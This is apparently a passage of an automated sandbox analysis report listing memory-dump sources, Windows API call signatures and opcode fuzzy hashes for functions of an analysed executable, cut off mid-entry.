                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ConsoleErrorLastMode
                                                    • String ID:
                                                    • API String ID: 953036326-0
                                                    • Opcode ID: e5bc4118b78d7803f2849d3b40dbb6165d02ed41efd1a206ffcb3739746c0941
                                                    • Instruction ID: ddcd89b9d8b3b2f5f207e9e69154c7c701be9947f1915117d1dd30dd202e8fa3
                                                    • Opcode Fuzzy Hash: e5bc4118b78d7803f2849d3b40dbb6165d02ed41efd1a206ffcb3739746c0941
                                                    • Instruction Fuzzy Hash: EB91D262E1866385F760DF6598442BD2BA9AB11B8CF5C413DDE0EB7B94CFB8D442C300
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _get_daylight$_isindst
                                                    • String ID:
                                                    • API String ID: 4170891091-0
                                                    • Opcode ID: a806384fd3dbc637569f566945d79e9d0f9a49a7dde5cce1babac435a7d8ed95
                                                    • Instruction ID: 0825c4f3f0380bb8c4bc96f0df7f598ff4becd9e4f9def89b51c03c145496a32
                                                    • Opcode Fuzzy Hash: a806384fd3dbc637569f566945d79e9d0f9a49a7dde5cce1babac435a7d8ed95
                                                    • Instruction Fuzzy Hash: 95512872F052324AEB24CF24ED416BD27A1AB5035DF59413DED1EB2AE9DF7CA4428700
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 1279662727-0
                                                    • Opcode ID: 2e3e6935fd272a0e473f5669fe72b613a847a441e18d85c9910f5be84e911a30
                                                    • Instruction ID: 1ea6041d9587343c3f5255c8e652f04261a71fe929dbb5d2934588ca1980f9af
                                                    • Opcode Fuzzy Hash: 2e3e6935fd272a0e473f5669fe72b613a847a441e18d85c9910f5be84e911a30
                                                    • Instruction Fuzzy Hash: E441D422D187A383E750CB219D103B96360FF95368F189338E69CA3AD5DFBCA5E58701
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                    • String ID:
                                                    • API String ID: 3251591375-0
                                                    • Opcode ID: 9d2a249925c3744b7bdec991b642967cea5aa1e4eae3f82ffa02bbb969e0fbb5
                                                    • Instruction ID: 991e5e70f4f4c0e18e2962765fd7a0526e6b88d7c3def2a66d577b323ecbf0c6
                                                    • Opcode Fuzzy Hash: 9d2a249925c3744b7bdec991b642967cea5aa1e4eae3f82ffa02bbb969e0fbb5
                                                    • Instruction Fuzzy Hash: 1A310C12E5822341FB14AB64AC523B922919FC17CCF8C603DEA4EFB2D7DEECB4458251
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentExitTerminate
                                                    • String ID:
                                                    • API String ID: 1703294689-0
                                                    • Opcode ID: a9ca9fd944998b9103efb0079ab816177775b60747cbceda43ee2d2e97830e0f
                                                    • Instruction ID: f96b8681641c6347cf629e15b364e3039981c5c1666de6f8896f93004dc110fb
                                                    • Opcode Fuzzy Hash: a9ca9fd944998b9103efb0079ab816177775b60747cbceda43ee2d2e97830e0f
                                                    • Instruction Fuzzy Hash: 94D09E11F1872342FA146B706C9A07A12115F58B49F18647CC81FB6397CDBCA44E8289
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectoryMessage
                                                    • String ID: Security descriptor is not initialized!
                                                    • API String ID: 73271072-986317556
                                                    • Opcode ID: cb4d7abd45f9f406bb8e9fa743bd3ea339ce9ab77a45f8f760c2574a3479da4c
                                                    • Instruction ID: 07d3d537e5cb3390e9737d96659b7cf687a1b5636642f9577473cd460d7c45d5
                                                    • Opcode Fuzzy Hash: cb4d7abd45f9f406bb8e9fa743bd3ea339ce9ab77a45f8f760c2574a3479da4c
                                                    • Instruction Fuzzy Hash: 61E092B2A5874682EA509B24FC0526923A0FBA1358FD8133CE54CE73E4DFBCD1598B00
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: cf177395047abfa4e851662a110b86e3e3c378c626585af56caf23d5c147307d
                                                    • Instruction ID: d49d917d8b143eebed1e910014831b7035b532e038115b222fc3940aa5bde812
                                                    • Opcode Fuzzy Hash: cf177395047abfa4e851662a110b86e3e3c378c626585af56caf23d5c147307d
                                                    • Instruction Fuzzy Hash: 5C510621B0926747EA6A9E25DC006BA6291BF44BACF1C473CDD6DB77C5DEBCE4058600
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                     • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastPointer
                                                    • String ID:
                                                    • API String ID: 2976181284-0
                                                    • Opcode ID: 5a688e03e61d2ba522e05303caa220c229835d3c67e189c94220df843fa187e3
                                                    • Instruction ID: a4842befb3767b977b887cb59cc8246e83cd831040a1f95da28daa4c8ab44721
                                                    • Opcode Fuzzy Hash: 5a688e03e61d2ba522e05303caa220c229835d3c67e189c94220df843fa187e3
                                                    • Instruction Fuzzy Hash: 3C11B262618AA281DA108B26F80406973A1AB44BF8F585339EA7DA77E9CFBCD0558700
                                                    APIs
                                                    • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF652EE875D), ref: 00007FF652EE8903
                                                    • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF652EE875D), ref: 00007FF652EE8919
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                     • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Time$System$FileLocalSpecific
                                                    • String ID:
                                                    • API String ID: 1707611234-0
                                                    • Opcode ID: f486ed6e5c3c2cbaa4962bae20fc4c636bf07173bccdb3ad29f0a9c75d11b156
                                                    • Instruction ID: d226e023c1c10ddf90df010b52b53cba4ca9ad6d398bdd3123fd4e9f66a3c2c9
                                                    • Opcode Fuzzy Hash: f486ed6e5c3c2cbaa4962bae20fc4c636bf07173bccdb3ad29f0a9c75d11b156
                                                    • Instruction Fuzzy Hash: B501A53291C66282E7609F14F80523AB3B1FB81B69F64433AE7AD915E8DFBDD004DB10
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(?,?,?,00007FF652EF3B72,?,?,?,00007FF652EF3BAF,?,?,00000000,00007FF652EF4075,?,?,00000000,00007FF652EF3FA7), ref: 00007FF652EEB716
                                                    • GetLastError.KERNEL32(?,?,?,00007FF652EF3B72,?,?,?,00007FF652EF3BAF,?,?,00000000,00007FF652EF4075,?,?,00000000,00007FF652EF3FA7), ref: 00007FF652EEB720
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                     • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 485612231-0
                                                    • Opcode ID: c0904582055235206b637bb6fb630becad907d152bf6a94a3ba36ee294329771
                                                    • Instruction ID: e53607224b42e3599c3cb732b2a3c75d0cd128cbaef37e03f1b0a0d00d114692
                                                    • Opcode Fuzzy Hash: c0904582055235206b637bb6fb630becad907d152bf6a94a3ba36ee294329771
                                                    • Instruction Fuzzy Hash: 12E0C251F0D22342FF18ABF2ACE547912515F88B58F5C153CC90DFB391EEACA89A8200
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                     • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: DeleteErrorFileLast
                                                    • String ID:
                                                    • API String ID: 2018770650-0
                                                    • Opcode ID: b1319888d58344e1d146038dbe51c945b0a95c66f9246088a0a26429922302e0
                                                    • Instruction ID: 46a3489ce3a848b5f525f0aa081eaa1ffae8be36dfd6149e2e51aefe94cc5a88
                                                    • Opcode Fuzzy Hash: b1319888d58344e1d146038dbe51c945b0a95c66f9246088a0a26429922302e0
                                                    • Instruction Fuzzy Hash: 47D01214F3892381F614B7F15C8507911946F4572CF681B3CC02DF12F0DEDCA08A5101
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                     • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: DirectoryErrorLastRemove
                                                    • String ID:
                                                    • API String ID: 377330604-0
                                                    • Opcode ID: 37b4a7e4d00d01a0eafeac234b577e395ecf372998b901b949fd5718f631df3e
                                                    • Instruction ID: e2121ec0ca674ff9b67edbf703efa8b69fdc28aafa13397f07dc41d016b29e70
                                                    • Opcode Fuzzy Hash: 37b4a7e4d00d01a0eafeac234b577e395ecf372998b901b949fd5718f631df3e
                                                    • Instruction Fuzzy Hash: E8D01254F2996385F61467B56C4547911906F84B3DF681A3CC01DF12E0DEECA04A5502
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?,?,?,00007FF652EEB78D,?,?,00000000,00007FF652EEB842), ref: 00007FF652EEB97E
                                                    • GetLastError.KERNEL32(?,?,?,00007FF652EEB78D,?,?,00000000,00007FF652EEB842), ref: 00007FF652EEB988
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                     • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: CloseErrorHandleLast
                                                    • String ID:
                                                    • API String ID: 918212764-0
                                                    • Opcode ID: 3fd0f83af0628cda6e58ba1b17cfc613668cd8d43ebee099ac9aff2e4f27651a
                                                    • Instruction ID: 28f0ac4c376f229a03286a7bc89f10f68640514ff01280227a2413ca346aab0c
                                                    • Opcode Fuzzy Hash: 3fd0f83af0628cda6e58ba1b17cfc613668cd8d43ebee099ac9aff2e4f27651a
                                                    • Instruction Fuzzy Hash: 7821C651B0866341EE949725AD9027D12816F54BACF5C433DDA6EE73E6CEECE4498300
                                                    APIs
                                                      • Part of subcall function 00007FF652ED8DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF652ED2A9B), ref: 00007FF652ED8E1A
                                                    • _findclose.LIBCMT ref: 00007FF652ED81A9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                     • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide_findclose
                                                    • String ID:
                                                    • API String ID: 2772937645-0
                                                    • Opcode ID: aa2a36deec39c3a11ec2b62d31fe43dc86d3decf01d493f1b5c8a3539a39b282
                                                    • Instruction ID: aad88034ef91da5904e063cab434b1222a8983d6fd188869fe2f6e23c24f4ef7
                                                    • Opcode Fuzzy Hash: aa2a36deec39c3a11ec2b62d31fe43dc86d3decf01d493f1b5c8a3539a39b282
                                                    • Instruction Fuzzy Hash: 97718D52E18BC581E711CB2CD9052FD6360F7A9B4CF58E329DB9C62592EF68E2D9C700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                     • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 23588c1d4a76148e9b0b46970dab15bc80394bd809d2a1daf00a983cf625f788
                                                    • Instruction ID: 243ea384a212898d57d30a308eb7ef233149a68757f13768cf81fcda4dfbf3b2
                                                    • Opcode Fuzzy Hash: 23588c1d4a76148e9b0b46970dab15bc80394bd809d2a1daf00a983cf625f788
                                                    • Instruction Fuzzy Hash: 9941E73390921387EA64DB25E94017D77A0FF56B48F182239D69EE36A0CFADE402C751
                                                     APIs
                                                     Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                     • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: DirectoryErrorLastRemove
                                                    • String ID:
                                                    • API String ID: 377330604-0
                                                    • Opcode ID: 9b68c8e0b8cd10c838e6d7f4f4b55f470fe5ed83debbdf123e575bf7c203fc29
                                                    • Instruction ID: ba0b23136f3a374e25ed023c6ca8ae096b3e6c78b47ed3732c8e5a6b8f170ded
                                                    • Opcode Fuzzy Hash: 9b68c8e0b8cd10c838e6d7f4f4b55f470fe5ed83debbdf123e575bf7c203fc29
                                                    • Instruction Fuzzy Hash: AC41A416D1C69681E711DB24D9013FD6360FBE5B88F48A63ADF8DA3193EF68A5D9C300
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                     • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _fread_nolock
                                                    • String ID:
                                                    • API String ID: 840049012-0
                                                    • Opcode ID: 6d3c7b181ef6f9ff6db6d645a81eef8910887d163046eb46ef411d48f89b68c2
                                                    • Instruction ID: d32d6b0d90a515b212c153fc4c22aad87d9aab4309ffc6113103b7021f5dd251
                                                    • Opcode Fuzzy Hash: 6d3c7b181ef6f9ff6db6d645a81eef8910887d163046eb46ef411d48f89b68c2
                                                    • Instruction Fuzzy Hash: 02218521B096B245FB50DB126D047FAA652BF85BD8F8C543CDE0DA7786DEBDE442C600
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                     • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 9d46e4dc1c7706e1baa247f93764384ede75e9bcf433252d370e5f4900f7c3d5
                                                    • Instruction ID: 2b2ebd798dbb89b457d88581682eca930bc7527121fd6411ca4768b1193df061
                                                    • Opcode Fuzzy Hash: 9d46e4dc1c7706e1baa247f93764384ede75e9bcf433252d370e5f4900f7c3d5
                                                    • Instruction Fuzzy Hash: 5631F563E0866381F7059B258C423BC2A50AF40B99F49163DDA1DB73D2DFFCE4428351
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                     • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                    • String ID:
                                                    • API String ID: 3947729631-0
                                                    • Opcode ID: 9c0127de50016242ddc74074b6af7f5d0c7ecdfc40d630aae62ff1a96a90ed2f
                                                    • Instruction ID: f912d64fb96f8294a91f8ae072cd009d6cb68d96fa19963b04a3d263bfa91cd0
                                                    • Opcode Fuzzy Hash: 9c0127de50016242ddc74074b6af7f5d0c7ecdfc40d630aae62ff1a96a90ed2f
                                                    • Instruction Fuzzy Hash: 34217136A04A2689EB14CF64C8566AC37B0EB4471CF58063DD61D96BD5DFB8D485C780
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                     • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: a12511eb413a20500788068782fa49ddb1fe92b02a1e7189881bce5d81ea64e9
